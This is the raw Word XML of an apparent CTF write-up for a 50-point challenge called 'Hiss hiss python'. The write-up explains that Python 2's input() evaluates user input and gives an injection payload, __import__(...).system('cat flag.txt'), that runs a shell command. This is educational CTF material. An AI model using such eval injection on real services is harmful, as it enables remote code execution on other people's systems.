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60" w:before="160" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="3c763d"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lae872ihsxp0" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:hyperlink r:id="rId6">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="337ab7"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hiss hiss python</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="3c763d"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (50pts)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challenge gave us the following source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user! I will give you a test. If you pass it, you get the flag\n"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"What is 2 + 3?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sys.stdout.flush()</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">x = input()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(x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"Eh, I was just kidding. No flag for you"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"Try again!"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immediately see that it uses the input() function to read the input, which has a vulnerability in Python 2 since it runs eval() on the input given. So we can easily inject python code and get RCE.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final payload looks as follows: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__import__(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).system(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'cat flag.txt'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misoaractf.ro/challenge?id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